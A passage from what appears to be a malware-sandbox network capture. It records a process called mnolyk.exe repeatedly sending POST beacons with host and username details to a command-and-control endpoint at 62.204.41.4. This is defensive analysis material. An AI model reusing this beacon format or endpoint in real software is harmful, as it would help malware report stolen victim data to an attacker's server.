                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:30.004774094 CET225INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      111192.168.2.74980662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:30.176071882 CET226OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:30.238473892 CET226INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      112192.168.2.74980762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:30.407497883 CET227OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:30.470520973 CET227INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      113192.168.2.74980862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:30.643129110 CET228OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:30.705678940 CET228INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      114192.168.2.74980962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:30.882145882 CET229OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:30.945619106 CET229INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      115192.168.2.74981062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:31.110999107 CET230OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:31.173835993 CET230INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      116192.168.2.74981162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:31.352080107 CET231OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:31.417216063 CET231INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      117192.168.2.74981262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:31.595525980 CET232OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:31.659557104 CET232INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      118192.168.2.74981362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:31.831965923 CET233OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:31.895565987 CET233INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      119192.168.2.74981462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:32.080926895 CET234OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:32.144121885 CET234INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      12192.168.2.74970662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:04.472245932 CET116OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:04.536338091 CET116INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      120192.168.2.74981562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:32.330391884 CET235OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:32.396243095 CET235INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      121192.168.2.74981662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:32.564007044 CET236OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:32.628300905 CET236INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      122192.168.2.74981762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:32.798707962 CET237OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:32.860562086 CET237INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      123192.168.2.74981862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:33.042481899 CET238OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:33.109855890 CET238INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      124192.168.2.74981962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:33.315464973 CET239OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:33.379378080 CET239INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      125192.168.2.74982062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:33.547734976 CET240OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:33.610548973 CET240INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      126192.168.2.74982162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:33.782680988 CET241OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:33.847265005 CET241INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      127192.168.2.74982262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:34.022866011 CET242OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:34.090245008 CET242INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      128192.168.2.74982362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:34.268182993 CET243OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:34.332073927 CET243INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
